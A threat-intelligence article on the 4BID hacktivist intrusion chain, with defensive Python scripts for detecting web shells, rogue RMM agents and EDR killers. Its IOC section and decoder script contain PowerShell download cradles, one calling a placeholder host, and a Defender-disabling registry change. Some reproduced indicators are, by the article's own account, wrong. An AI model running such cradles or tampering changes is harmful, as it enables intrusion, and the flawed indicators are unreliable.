Kaspersky’s Global Research and Analysis Team (GReAT) published a report on June 8, 2026, describing a significant escalation in hacktivist operations tied to the 4BID collective and overlapping threat groups. Initially focused on targets in Russia and Belarus, these actors have broadened their scope internationally, chaining Microsoft Exchange web shells, remote monitoring and management (RMM) tools, ransomware payloads, and EDR (Endpoint Detection and Response) killers into a single intrusion pattern. The expansion marks a new chapter in politically motivated cyberattacks, with organizations worldwide facing collateral damage from increasingly sophisticated campaigns.

The 4BID Collective: From Hacktivism to Cybercrime

4BID emerged in the hacktivist landscape around 2022, initially claiming allegiance to pro-Ukraine causes. The group’s name, stylized as “4BID” or “Forbidden,” reflects their disruptive ethos. Early operations focused on defacements and DDoS attacks against Russian and Belarusian government entities, media outlets, and critical infrastructure. Over time, however, their tactics matured significantly.

According to Kaspersky, the group has evolved into a more structured operation, possibly collaborating with or drawing members from other hacktivist collectives such as Killnet and Anonymous Sudan. Both of those collectives have publicly aligned themselves with pro-Russian causes, which makes the reported overlap with a group that began by attacking Russian targets noteworthy in itself. This convergence has produced an expanded toolkit that includes techniques commonly associated with financially motivated ransomware gangs and advanced persistent threats (APTs). The line between hacktivism and cybercrime continues to blur: 4BID actors now deploy ransomware and data-wiping malware alongside their politically charged messaging. Researchers tracked multiple Telegram channels where 4BID coordinates operations and leaks stolen data, often framing its actions as “digital resistance.”

Geographic Expansion: Beyond Russia and Belarus

The most striking finding in Kaspersky’s report is the geographical expansion. While previous campaigns predominantly targeted organizations in Russia and Belarus—such as government agencies, energy companies, and telecommunications firms—victims are now appearing in Eastern Europe, the Middle East, and North America. The threat actors appear to be using compromised infrastructure as launching points for further attacks, sometimes hitting unintended targets along the way.

This international spillover is partly due to the group’s use of unpatched Exchange servers as primary entry vectors. Once a server is compromised, it becomes a node in their botnet-like infrastructure, regardless of its physical location. Organizations that assumed they were not at risk because they fell outside the political crosshairs are now discovering that their systems have been ensnared in these campaigns. Kaspersky’s telemetry indicates a 300% increase in attacks originating from previously compromised Exchange servers since early 2025.

Attack Chain: Exchange Web Shells as the Initial Foothold

Kaspersky’s incident response investigations have revealed a consistent attack pattern. The initial access vector in most cases involves exploiting vulnerabilities in Microsoft Exchange Server. While the group has used both known and zero-day flaws, the most common entry points are unpatched servers vulnerable to older exploit chains such as ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and ProxyLogon (CVE-2021-26855, chained with the CVE-2021-27065 file-write bug to drop a web shell). Despite patches being available for years, a significant number of Exchange servers remain unpatched globally. A 2026 Shodan scan identified over 80,000 Exchange servers still running cumulative updates from 2021 or earlier.

After exploiting the vulnerability, the attackers drop a web shell—often a simple .aspx file—into a publicly accessible directory on the Exchange server. These web shells provide persistent remote access through HTTP requests, blending in with normal web traffic. Kaspersky identified several custom web shells used, including:

  • ews.aspx: A heavily obfuscated script that mimics the appearance of legitimate Exchange Web Services code.
  • outlook.aspx: Hidden in the /owa/auth/ directory, using AES-encrypted command strings passed via POST parameters.
  • ecp.aspx: A minimalistic shell that only executes PowerShell commands, designed to evade pattern-based detection.

Once the web shell is in place, the attackers use it to execute PowerShell commands, download additional tools, and escalate privileges. They frequently leverage the Exchange PowerShell backend to run LDAP queries and move laterally toward domain controllers, helped by the broad Active Directory rights an Exchange server holds by default. The attackers also deploy multiple shells across different directories so that access survives even if one shell is found and removed; each shell is a redundant entry point rather than a one-off.
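As an added example (not code from the Kaspersky report or from the article), the following Python script hunts for the request pattern described above in Exchange front-end IIS logs: .aspx pages outside a known-good baseline, unauthenticated POSTs to them, query strings to unknown pages, and repeated hits on one page from one client. The log lines, the baseline of known-good pages and the IP addresses are all constructed; build the real baseline from a clean server rather than from memory.

```python
"""Hunt for web-shell requests in Exchange front-end IIS logs (W3C format).

Added example for this article, not code from the Kaspersky report. The log
lines, the baseline of known-good pages and the client IPs are all constructed.
"""
from collections import Counter

# Illustrative baseline of .aspx pages a clean Exchange front end serves.
# In practice build this from a known-good server (e.g. Get-ChildItem over the
# FrontEnd\HttpProxy directories) rather than from memory.
KNOWN_GOOD_ASPX = {
    "/owa/auth/logon.aspx", "/owa/auth/logoff.aspx", "/owa/auth/errorfe.aspx",
    "/ecp/default.aspx", "/ecp/auth/logon.aspx",
}
# aspnet_client holds client-side script only; a server page there is never legitimate.
NO_ASPX_DIRS = ("/aspnet_client/",)

# Constructed sample log (IIS escapes spaces in the user agent as '+').
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2026-05-20 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2026-05-20 08:01:12 10.0.0.5 POST /owa/auth/logon.aspx - 443 - 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0) 200 120
2026-05-20 08:03:44 10.0.0.5 GET /owa/auth/outlook.aspx - 443 - 198.51.100.7 python-requests/2.31 200 15
2026-05-20 08:03:45 10.0.0.5 POST /owa/auth/outlook.aspx - 443 - 198.51.100.7 python-requests/2.31 200 230
2026-05-20 08:05:02 10.0.0.5 POST /aspnet_client/ews.aspx cmd=whoami 443 - 198.51.100.7 python-requests/2.31 200 340
2026-05-20 08:07:30 10.0.0.5 GET /ecp/default.aspx - 443 CONTOSO\\admin 10.0.0.20 Mozilla/5.0+(Windows+NT+10.0) 200 80
"""


def parse_iis_log(text):
    """Return one dict per request, keyed by the names in the #Fields: directive."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # truncated or malformed line; do not guess
        records.append(dict(zip(fields, parts)))
    return records


def find_webshell_candidates(records, known_good=KNOWN_GOOD_ASPX):
    """Flag .aspx requests that hit pages outside the baseline, with the reasons."""
    hits = []
    for r in records:
        uri = r["cs-uri-stem"].lower()
        if not uri.endswith(".aspx"):
            continue
        reasons = []
        if uri.startswith(NO_ASPX_DIRS):
            reasons.append("server page under client-script directory")
        elif uri not in known_good:
            reasons.append("page not in baseline")
        if not reasons:
            continue
        # Web shells are driven by unauthenticated POSTs, often from scripting UAs.
        if r["cs-method"] == "POST" and r["cs-username"] == "-":
            reasons.append("unauthenticated POST")
        if r["cs-uri-query"] != "-":
            reasons.append("query string to unknown page")
        hits.append({"time": f"{r['date']} {r['time']}", "uri": uri, "client": r["c-ip"],
                     "method": r["cs-method"], "ua": r["cs(User-Agent)"], "reasons": reasons})
    return hits


def summarize(hits):
    """Requests per (page, client): repeated hits on one unknown page from one IP means an operator."""
    return Counter((h["uri"], h["client"]) for h in hits)


if __name__ == "__main__":
    for h in find_webshell_candidates(parse_iis_log(SAMPLE_LOG)):
        print(h["time"], h["client"], h["method"], h["uri"], "|", "; ".join(h["reasons"]))
```

Run it over the W3C logs under each front-end server’s inetpub\logs\LogFiles directory. The same baseline doubles as a file-system check: any .aspx present under the FrontEnd\HttpProxy directories that is not in it deserves a look, whether or not it has been requested yet.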

Leveraging Remote Management Tools for Stealth and Persistence

One of the more insidious aspects of the 4BID-linked campaigns is the abuse of legitimate remote management and monitoring (RMM) tools. After gaining initial access, the attackers install commercial RMM software such as AnyDesk, TeamViewer, Atera Agent, and ScreenConnect (formerly ConnectWise Control). These tools, while designed for legitimate IT administration, allow threat actors to establish a secondary, stealthy channel for command and control.

Because RMM tools are signed by trusted publishers and commonly used in enterprise environments, they rarely trigger alerts on their own. The attackers configure them to run as Windows services so that they survive reboots, which leaves a Service Control Manager Event ID 7045 (“a service was installed”) in the System log, one of the few reliable traces of the install. Through RMM, they conduct lateral movement, exfiltrate data, and prepare the final payload. Kaspersky observed that in one incident the Atera Agent was installed via a GPO script, making it look like an approved IT deployment; the attackers then used it to browse file shares and copy terabytes of sensitive data over a three-week period.
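An added example, not from the Kaspersky report, of how a defender turns “know which RMM tools are approved” into a check: the script classifies service-install records (Event ID 7045 shape) against an approved-RMM policy of product plus install root, and flags outbound flows from named servers to external addresses on the products’ default ports. The policy, the events, the flow records and the host names are all constructed; the port numbers are the vendors’ documented defaults.

```python
"""Flag unapproved RMM agents from service-install events and outbound flows.

Added example for this article, not from the Kaspersky report. The policy
(which products and install roots are approved), the events and the flows are
all constructed; adjust the tables to your own environment.
"""
import re
from ipaddress import ip_address, ip_network

# Case-insensitive patterns that identify common RMM products in a service
# name or image path.
RMM_SIGNATURES = {
    "AnyDesk": r"anydesk",
    "TeamViewer": r"teamviewer",
    "Atera": r"atera",
    "ScreenConnect": r"screenconnect|connectwise",
}
# Constructed policy: the only sanctioned product, and the only roots a
# packaged deployment writes to. Agents under ProgramData, Temp or a user
# profile are treated as unapproved even for a sanctioned product.
APPROVED_PRODUCTS = {"Atera"}
APPROVED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")

# Vendor default direct/relay ports: TeamViewer 5938, AnyDesk 6568,
# ScreenConnect 8040/8041. All of them also fall back to 443/80, so a port
# match is a strong signal and its absence is not a clean bill of health.
RMM_PORTS = {5938: "TeamViewer", 6568: "AnyDesk", 8040: "ScreenConnect", 8041: "ScreenConnect"}
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed records in the shape of System log Event ID 7045 (service installed).
SERVICE_EVENTS = [
    {"host": "EXCH01", "event_id": 7045, "ServiceName": "AteraAgent",
     "ImagePath": "C:\\ProgramData\\Atera\\AteraAgent.exe", "AccountName": "LocalSystem"},
    {"host": "FS02", "event_id": 7045, "ServiceName": "AteraAgent",
     "ImagePath": "C:\\Program Files\\ATERA Networks\\AteraAgent\\AteraAgent.exe", "AccountName": "LocalSystem"},
    {"host": "EXCH01", "event_id": 7045, "ServiceName": "AnyDesk Service",
     "ImagePath": "C:\\Users\\Public\\anydesk.exe --service", "AccountName": "LocalSystem"},
    {"host": "WS15", "event_id": 7045, "ServiceName": "Sense",
     "ImagePath": "C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe", "AccountName": "LocalSystem"},
]
# Constructed outbound flow records (firewall or NetFlow export).
FLOWS = [
    {"host": "EXCH01", "dst": "203.0.113.50", "dport": 5938, "proto": "tcp"},
    {"host": "EXCH01", "dst": "10.0.0.20", "dport": 445, "proto": "tcp"},
    {"host": "WS15", "dst": "198.51.100.80", "dport": 6568, "proto": "tcp"},
    {"host": "FS02", "dst": "203.0.113.9", "dport": 443, "proto": "tcp"},
]


def classify_service(ev):
    """Return (product, verdict); (None, None) when the service is not an RMM agent."""
    haystack = f"{ev['ServiceName']} {ev['ImagePath']}".lower()
    for product, pattern in RMM_SIGNATURES.items():
        if re.search(pattern, haystack):
            break
    else:
        return None, None
    path = ev["ImagePath"].lower()
    approved = product in APPROVED_PRODUCTS and path.startswith(APPROVED_ROOTS)
    return product, "approved" if approved else "unapproved"


def unapproved_rmm_installs(events):
    """(host, product, image path) for every 7045 event that installs an unapproved agent."""
    out = []
    for ev in events:
        if ev.get("event_id") != 7045:
            continue
        product, verdict = classify_service(ev)
        if verdict == "unapproved":
            out.append((ev["host"], product, ev["ImagePath"]))
    return out


def is_internal(ip):
    """Membership in the organisation's own ranges (RFC 1918 here), not ipaddress.is_private."""
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def rmm_port_flows(flows, servers):
    """Flows from the named servers (e.g. Exchange hosts) to external IPs on RMM ports."""
    return [(f["host"], f["dst"], f["dport"], RMM_PORTS[f["dport"]])
            for f in flows
            if f["host"] in servers and f["dport"] in RMM_PORTS and not is_internal(f["dst"])]


if __name__ == "__main__":
    for hit in unapproved_rmm_installs(SERVICE_EVENTS):
        print("unapproved RMM service:", *hit)
    for hit in rmm_port_flows(FLOWS, {"EXCH01", "FS02"}):
        print("RMM-port flow from server:", *hit)
```

The GPO-scripted Atera install from the incident above would still land in this check: the deployment mechanism changes how the binary arrives, not the 7045 event its service registration produces or the path it runs from.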

Ransomware: A New Tactic for Hacktivists

The deployment of ransomware is a notable shift in 4BID’s modus operandi. Previously, the group’s activities leaned toward data destruction and website defacements typical of hacktivist protest. The addition of ransomware suggests either a financial motivation to fund operations or a desire to cause maximum disruption.

In several cases analyzed by Kaspersky, the ransomware was custom-developed, with relatively straightforward encryption routines using AES-256 and RSA-2048. In those cases the ransom notes carried political demands rather than financial ones, such as calls for the withdrawal of troops or the release of prisoners. In other instances the attackers used leaked or repurposed ransomware strains, including a variant built from the Conti source code that leaked in 2022. Where money was demanded, the amounts ranged from 2 to 10 bitcoins, and payment did not guarantee that data had not also been exfiltrated and leaked.

Kaspersky identified two primary ransomware families:
- ForbidLock: Custom malware written in C++, appending .4bid extension to encrypted files. It uses a hardcoded public key and generates a unique victim ID based on system GUID.
- ContiForbid: A modified Conti variant with most of the sophisticated features stripped out, leaving only core encryption and a demand note in Ukrainian and English.

Both variants spread manually through RMM tools rather than using automated self-propagation, indicating the attackers’ preference for controlled, targeted encryption.

EDR Killers: Neutralizing Defenses

Perhaps the most alarming component of these attacks is the use of EDR killers—tools specifically designed to disable or blind endpoint detection and response systems. Kaspersky identified the use of multiple EDR killer utilities, including a custom tool that exploits legitimate but vulnerable drivers to terminate security processes. This technique, known as Bring Your Own Vulnerable Driver (BYOVD), has been increasingly adopted by ransomware groups in recent years.

The specific EDR killer observed in 4BID attacks loads a signed third-party driver; the report names it as GigabyteUpdateService.sys from a hardware monitoring utility and pairs it with CVE-2022-3699. That pairing does not match the public CVE record, where CVE-2022-3699 is a privilege-escalation flaw in the Lenovo Diagnostics Driver, so treat the driver name and CVE as unconfirmed and match on file hashes and loading behaviour instead. Whatever the driver, the mechanism is the same: once it is loaded with kernel privileges, its unrestricted primitives let the attackers terminate protected processes belonging to EDR products from Microsoft, CrowdStrike, SentinelOne, and others. Once the EDR is neutralized, the ransomware payload executes without interference, encrypting files rapidly.

Kaspersky’s researchers noted that the EDR killer first attempted to disable Windows Defender’s real-time protection via registry edits and PowerShell cmdlets, and loaded the driver only afterwards; where Defender’s tamper protection is on, that first route is blocked, which is why the driver is the fallback. In some cases it used the vulnerable driver to delete Windows Event Log files and security software directories, hindering forensic analysis. The combination of RMM for lateral movement and an EDR killer for stealth makes these intrusions particularly hard to contain.
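The detection side of this sequence, as an added example rather than anything from the report: the script below correlates constructed Sysmon-style events (ID 6 driver load, ID 13 registry SetValue, ID 5 process terminate) into the three signals the paragraph above describes: a driver loaded from a user-writable path or matching a blocklist hash, a security service’s Start value changed, and EDR processes dying within a short window after the driver load. The hashes, timestamps, process IDs and the signer string are placeholders; the process and service names are the real ones for Defender, Defender for Endpoint, SentinelOne and CrowdStrike.

```python
"""Correlate Sysmon events into an EDR-killer / BYOVD detection.

Added example for this article, not from the Kaspersky report. The events,
the driver hashes in the blocklist and the timestamps are constructed; in
production the blocklist comes from Microsoft's vulnerable driver blocklist or
the LOLDrivers project, and the events from Sysmon IDs 6, 13 and 5.
"""
from datetime import datetime, timedelta
import re

# Constructed blocklist (placeholder hashes, not real driver hashes).
BLOCKED_DRIVER_SHA256 = {
    "1111111111111111111111111111111111111111111111111111111111111111": "constructed vulnerable hw-monitor driver",
}
# Drivers are normally installed under System32\drivers; a load from any of
# these roots means something dropped a driver at runtime.
USER_WRITABLE_ROOTS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\")
# Security product processes a kernel-mode killer would target.
EDR_PROCESSES = {"msmpeng.exe", "mssense.exe", "sentinelagent.exe", "csfalconservice.exe"}
# Services whose Start value should stay 2 (SERVICE_AUTO_START).
PROTECTED_SERVICES = {"windefend", "wdnissvc", "sense"}

EVENTS = [
    {"EventID": 6, "UtcTime": "2026-05-20 07:00:00.000", "ImageLoaded": "C:\\Windows\\System32\\drivers\\tcpip.sys",
     "Hashes": "SHA256=2222222222222222222222222222222222222222222222222222222222222222",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 5, "UtcTime": "2026-05-20 07:30:00.000", "Image": "C:\\Windows\\System32\\notepad.exe", "ProcessId": 900},
    {"EventID": 13, "UtcTime": "2026-05-20 08:09:40.100", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\WinDefend\\Start", "Details": "DWORD (0x00000004)"},
    {"EventID": 6, "UtcTime": "2026-05-20 08:10:03.123", "ImageLoaded": "C:\\ProgramData\\upd\\GigabyteUpdateService.sys",
     "Hashes": "SHA256=1111111111111111111111111111111111111111111111111111111111111111",
     "Signed": "true", "Signature": "Example Hardware Vendor (constructed)", "SignatureStatus": "Valid"},
    {"EventID": 5, "UtcTime": "2026-05-20 08:10:05.900", "Image": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "ProcessId": 3120},
    {"EventID": 5, "UtcTime": "2026-05-20 08:10:06.200",
     "Image": "C:\\Program Files\\SentinelOne\\Sentinel Agent\\SentinelAgent.exe", "ProcessId": 4410},
]


def ts(ev):
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def parse_hashes(field):
    """'SHA256=abc,MD5=def' -> {'SHA256': 'abc', 'MD5': 'def'}"""
    return dict(kv.split("=", 1) for kv in field.split(",") if "=" in kv)


def suspicious_driver_loads(events):
    """Event 6 loads that are blocklisted or come from a user-writable path. A valid
    signature is not exculpatory: BYOVD drivers are signed, that is the point."""
    out = []
    for ev in events:
        if ev["EventID"] != 6:
            continue
        path = ev["ImageLoaded"].lower()
        sha = parse_hashes(ev.get("Hashes", "")).get("SHA256", "").lower()
        reasons = []
        if sha in BLOCKED_DRIVER_SHA256:
            reasons.append("blocklisted hash")
        if path.startswith(USER_WRITABLE_ROOTS):
            reasons.append("user-writable path")
        if reasons:
            out.append({"time": ev["UtcTime"], "driver": ev["ImageLoaded"], "sha256": sha, "reasons": reasons})
    return out


def security_service_tampering(events):
    """Event 13 SetValue on a protected service's Start value to anything but 2."""
    out = []
    for ev in events:
        if ev["EventID"] != 13:
            continue
        m = re.search(r"\\services\\([^\\]+)\\start$", ev["TargetObject"].lower())
        if not m or m.group(1) not in PROTECTED_SERVICES:
            continue
        val = re.search(r"0x([0-9a-f]+)", ev["Details"], re.I)
        start = int(val.group(1), 16) if val else None
        if start != 2:
            out.append({"time": ev["UtcTime"], "service": m.group(1), "start": start, "by": ev["Image"]})
    return out


def edr_kill_sequences(events, window_s=120):
    """A suspicious driver load followed within window_s by EDR process terminations (Event 5)."""
    kills = [ev for ev in events if ev["EventID"] == 5
             and ev["Image"].rsplit("\\", 1)[-1].lower() in EDR_PROCESSES]
    out = []
    for load in suspicious_driver_loads(events):
        t0 = datetime.strptime(load["time"], "%Y-%m-%d %H:%M:%S.%f")
        killed = sorted(k["Image"].rsplit("\\", 1)[-1].lower() for k in kills
                        if t0 <= ts(k) <= t0 + timedelta(seconds=window_s))
        if killed:
            out.append({"driver": load["driver"], "loaded_at": load["time"], "killed": killed})
    return out


if __name__ == "__main__":
    print("driver loads:", suspicious_driver_loads(EVENTS))
    print("service tampering:", security_service_tampering(EVENTS))
    print("kill sequences:", edr_kill_sequences(EVENTS))
```

The correlation is deliberately anchored on the driver load rather than on the process terminations: EDR processes restart during updates all the time, but a driver appearing from ProgramData and two security agents dying within seconds of it is the actual signature of the technique.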

Indicators of Compromise and Technical Details

Kaspersky has shared a set of indicators to help defenders identify 4BID-linked intrusions. As reproduced in this article they cover a file hash, an RMM artefact, a driver, a registry change and a command line; two of them need a caveat before they go into a detection rule:

  • Web shell hash (ews.aspx obfuscated shell): SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855. This value is the SHA-256 of empty input (zero bytes), so it cannot identify a web shell; obtain the real hash from the report before using it.
  • RMM agent (unapproved remote access): AteraAgent.exe installed in C:\ProgramData\Atera\.
  • EDR killer driver (vulnerable signed driver): GigabyteUpdateService.sys, version 1.0.0.1.
  • Registry modification (disables the Windows Defender service): HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\Start set to 4 (SERVICE_DISABLED).
  • PowerShell command (Base64-encoded download cradle): powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AJwArACQAZQB4AGYAaQBsAGUALgBzAHUAcABwAG8AcgB0AGUAcgAuAGMAbwBtAC8AYQBuAHkAZABlAHMAawAuAGUAeABlACcAKQAgACkAIAA=. The blob decodes (UTF-16LE, as -EncodedCommand expects) to IEX (New-Object Net.WebClient).DownloadString('http://'+$exfile.supporter.com/anydesk.exe') ), which is not valid PowerShell (unbalanced quotes and parentheses) and, even if it were, would execute a fetched script through IEX rather than save AnyDesk to disk. Treat it as the shape of an encoded download cradle rather than a literal string to match.

Organizations should also look for anomalous outbound connections from Exchange servers to rare external IPs, especially on the ports RMM products use (TCP 80, 443 and 8080 as generic fallbacks, plus the product defaults: 5938 for TeamViewer, 6568 for AnyDesk, 8040/8041 for ScreenConnect). Because every one of these tools falls back to 443, a port match is a strong signal but its absence is not a clean bill of health; an Exchange server talking to an unfamiliar host on 443 deserves the same scrutiny.
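The encoded command in the indicator list is worth decoding rather than matching as a string. The following Python is an added example (not from the report): it pulls the Base64 blob from a -enc/-EncodedCommand argument, decodes it as the UTF-16LE text PowerShell expects, flags download-cradle constructs, and runs a cheap syntax sanity check so that a malformed sample like the one above is reported as such. ARTICLE_CMD is the indicator’s value verbatim; the other command lines, the host 203.0.113.5 and the script paths are constructed.

```python
"""Decode PowerShell -EncodedCommand payloads and triage them for download cradles.

Added example for this article, not from the Kaspersky report. ARTICLE_CMD is
the encoded string printed in the indicator list above, decoded here as-is;
the other command lines are constructed.
"""
import base64
import re

ARTICLE_CMD = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBu"
    "AGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AJwArACQAZQB4AGYAaQBsAGUALgBzAHUAcABwAG8A"
    "cgB0AGUAcgAuAGMAbwBtAC8AYQBuAHkAZABlAHMAawAuAGUAeABlACcAKQAgACkAIAA="
)

# Spellings PowerShell resolves to -EncodedCommand that show up in the wild
# (-e, -ec, -en, -enc, -EncodedCommand); case-insensitive.
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Name -> regex over the decoded, lower-cased script.
CRADLE_INDICATORS = [
    ("downloadstring", r"downloadstring"),
    ("downloadfile", r"downloadfile"),
    ("webclient", r"net\.webclient"),
    ("invoke-webrequest", r"invoke-webrequest|\biwr\b"),
    ("invoke-expression", r"invoke-expression|\biex\b"),
    ("frombase64string", r"frombase64string"),
    ("bits", r"start-bitstransfer|bitsadmin"),
]


def decode_encoded_command(cmdline):
    """Return the decoded script, or None if the line has no (valid) encoded command."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate padding stripped by a log pipeline
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def cradle_indicators(script):
    s = script.lower()
    return [name for name, pat in CRADLE_INDICATORS if re.search(pat, s)]


def well_formed(script):
    """Cheap syntax sanity check: balanced quotes and parentheses."""
    return (script.count("'") % 2 == 0 and script.count('"') % 2 == 0
            and script.count("(") == script.count(")"))


def triage(cmdlines):
    """One verdict per command line that carries an encoded command."""
    out = []
    for line in cmdlines:
        script = decode_encoded_command(line)
        if script is None:
            continue
        out.append({"cmdline": line, "decoded": script.strip(),
                    "indicators": cradle_indicators(script),
                    "well_formed": well_formed(script)})
    return out


def encode_for_sample(script):
    """Helper used only to build constructed samples (what -EncodedCommand expects)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines as they would appear in Sysmon Event ID 1 / 4688 CommandLine.
SAMPLE_CMDLINES = [
    "powershell -enc " + ARTICLE_CMD,
    "powershell.exe -NoP -W Hidden -ec " + encode_for_sample(
        "IEX (New-Object Net.WebClient).DownloadFile('http://203.0.113.5/a.exe','C:\\Users\\Public\\a.exe')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell -EncodedCommand " + encode_for_sample("Get-Service WinDefend | Select-Object Status"),
]

if __name__ == "__main__":
    for v in triage(SAMPLE_CMDLINES):
        print(v["indicators"] or "no cradle", "| well-formed:", v["well_formed"], "|", v["decoded"][:80])
```

Matching on the decoded text instead of the Base64 is what makes the rule survive trivial changes: re-encoding the same cradle with a different URL, or with a space added anywhere, changes every character of the blob but none of the indicators.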

Implications for Windows and Exchange Environments

The 4BID campaign poses severe risks for organizations running Windows-based infrastructure, particularly those with on-premises Exchange servers. Many of the techniques—web shells, RMM abuse, BYOVD—are not blocked by default security configurations and require advanced detection capabilities. The attack chain underscores several persistent security gaps:

  • Unpatched Exchange servers: A 2026 survey by a security vendor indicated that nearly 30% of internet-facing Exchange servers still run outdated cumulative updates. Attackers routinely scan for these vulnerable servers.
  • Blind trust in signed binaries: The abuse of signed RMM tools and vulnerable drivers highlights the limitations of signature-based detection and application whitelisting that does not scrutinize behavior.
  • Kernel-level threats: A vulnerable driver gives the attacker kernel execution, beneath anything a user-mode security agent can enforce, so defenders need driver blocklists and kernel integrity protections (HVCI), not just better user-mode detection.
  • Hacktivist unpredictability: Organizations that may not have considered themselves targets for political hacktivism are now learning that ideologically motivated groups can become opportunistic.

Windows Server hardening alone is insufficient; organizations must adopt a “never trust, always verify” posture, evaluating every signed binary for anomalous activity.

Defensive Strategies and Mitigations

To counter the threat posed by groups like 4BID, Kaspersky and other security experts recommend a layered defense approach:

  1. Patch Exchange immediately: If you run Exchange on-premises, move to the latest cumulative update and apply security updates without delay. Microsoft’s Exchange Server Health Checker script (HealthChecker.ps1 from the CSS-Exchange repository) reports the installed build against the current one and flags known misconfigurations. Patching for 2021-era bugs such as ProxyLogon and ProxyShell remains critical, because those are the exploits still in use.
  2. Harden Exchange servers: Restrict external access where possible (the ECP virtual directory in particular should not be reachable from the internet), enforce multi-factor authentication for all administrative interfaces, and remove unused virtual directories.
  3. Monitor for web shells: Deploy file integrity monitoring on web-accessible directories. Look for newly created .aspx, .asp, or .php files in unexpected locations.
  4. Control RMM software: Maintain an inventory of approved remote management tools. Create application control policies that block unapproved RMM installations.
  5. Implement driver blocklist policies: On Windows endpoints and servers, enforce Microsoft’s recommended driver block rules through a WDAC (Windows Defender Application Control, now App Control for Business) policy, or turn on the Microsoft Vulnerable Driver Blocklist setting under Core isolation in Windows Security, which requires memory integrity (HVCI). Treat the blocklist as a floor: it only covers drivers Microsoft already knows about.
  6. Enable EDR and logging: Ensure that your EDR or antivirus has tamper protection enabled. Forward logs to a centralized SIEM that can detect EDR-killer activity, such as service termination or driver load events.
  7. Conduct threat hunting: Look for indicators of compromise provided in Kaspersky’s report, such as specific web shell filenames, RMM agents installed via scripting, and the SHA-256 hashes of the EDR killer components.

Microsoft has also released guidance on blocking vulnerable drivers and securing Exchange. Note that a WDAC policy which allows only Microsoft-signed drivers does not, by itself, stop BYOVD: the drivers abused in these attacks carry valid WHQL or attestation signatures issued through Microsoft’s own signing pipeline. The policy has to pair that allow rule with the vulnerable driver blocklist and, where the environment can tolerate it, narrow the allow list to the specific driver files the fleet actually needs.

The Future of Hacktivism: Blending Ideology with Criminal Tactics

The 4BID campaign exemplifies a troubling trend: hacktivist groups no longer confine themselves to low-sophistication defacements or DDoS. By adopting ransomware, EDR killers, and stealthy RMM tools, they are closing the capability gap with state-sponsored actors and ransomware-as-a-service operators. This convergence means that any organization—regardless of its political affiliations—can become a victim if its infrastructure is vulnerable.

Kaspersky’s report serves as a wake-up call for defenders who may have dismissed hacktivism as a nuisance threat. The coming months will likely see further iteration of these tactics, especially as geopolitical tensions continue to fuel cyber operations. Organizations must assume that their internet-facing assets are constant targets and act accordingly.

Conclusion

The June 8, 2026, report from Kaspersky on the 4BID group’s expansion is a stark reminder that hacktivism is no longer a fringe activity. With the combination of Exchange web shells, RMM tools, ransomware, and EDR killers, these actors have assembled a powerful attack chain capable of crippling businesses and governments alike. Proactive defense, built around timely patching, detection of abnormal tool usage, and kernel-level monitoring, is the only strategy that works. Until that is in place, every unpatched Exchange server is a potential entry point for the next wave of politically motivated, and increasingly destructive, cyberattacks.